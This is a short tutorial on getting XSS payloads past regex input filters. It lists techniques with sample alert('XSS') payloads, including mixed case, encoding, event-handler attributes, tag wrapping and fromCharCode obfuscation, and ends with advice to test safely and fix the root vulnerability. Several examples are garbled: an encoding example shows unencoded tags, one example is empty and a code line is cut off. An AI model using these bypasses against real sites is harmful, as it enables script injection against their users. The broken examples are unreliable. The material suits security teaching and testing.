TL;DR
Regex filters are often used to prevent Cross-Site Scripting (XSS) attacks, but they’re rarely perfect. This guide shows common bypass techniques to get your malicious JavaScript code executed despite the filter.
Understanding the Problem
Web applications use regular expressions (regex) to identify and block potentially harmful input. However, regex can be complex and easily tricked. A poorly written regex might allow variations of XSS payloads that still execute JavaScript.
Bypassing Techniques
- Case Sensitivity: Some filters are case-sensitive. Try mixing upper and lowercase letters.
- Instead of
<script>alert('XSS')</script>, try<ScRiPt>alert('XSS')</sCrIpT>
- Instead of
- HTML Encoding: Encode characters that the filter might block.
- Replace
<with<and>with>. - Example:
<script>alert('XSS')</script>
- Replace
- URL Encoding: Encode the entire payload.
- Use a URL encoder (online tools are available). For example,
%3Cscript%3Ealert('XSS')%3C/script%3E.
- Use a URL encoder (online tools are available). For example,
- Double Encoding: Encode the encoded payload.
- Encode it twice to potentially bypass multiple layers of filtering.
- Whitespace and Newlines: Insert whitespace or newlines within tags.
- Try
<script >alert('XSS')</script>or<script%0a>alert('XSS')</script>
- Try
- Attribute Injection: Inject JavaScript into HTML attributes.
- Example:
<img src="x" onerror=alert('XSS')>. Theonerrorattribute executes JavaScript when the image fails to load. - Another example:
<input type="text" onfocus=alert('XSS') autofocus>. Theonfocusevent triggers when the input field gains focus, andautofocusautomatically focuses it.
- Example:
- Event Handlers: Use other HTML event handlers.
- Examples include
onload,onclick,onmouseover, etc. - Example:
<body onload=alert('XSS')>
- Examples include
- Tag Variations: Try different HTML tags.
- Instead of
<script>, try<svg><script>alert('XSS')</script></svg>or<iframe><script>alert('XSS')</script></iframe>
- Instead of
- Comments: Use HTML comments.
- Example:
. Some filters might not properly handle comments.
- Example:
- Payload Obfuscation: Use JavaScript string manipulation to hide the payload.
- Example:
String.fromCharCode(97, 108, 101, 114, 116, 40, 39, 88, 83, 83, 39, 41This creates the string ‘alert(‘XSS’)’.
- Example:
- Context Awareness: Understand where your input is being placed in the HTML.
- If it’s inside an attribute value, single quotes might be needed instead of double quotes.
- If it’s within a JavaScript string, you need to escape characters appropriately.
Important Considerations
- Testing: Always test your payloads in a safe environment before using them on live systems.
- Filter Evasion is Not the Goal: The best approach is to fix the underlying vulnerability that allows XSS in the first place, not just bypass filters.
- cyber security Best Practices: Implement proper input validation and output encoding to prevent XSS attacks.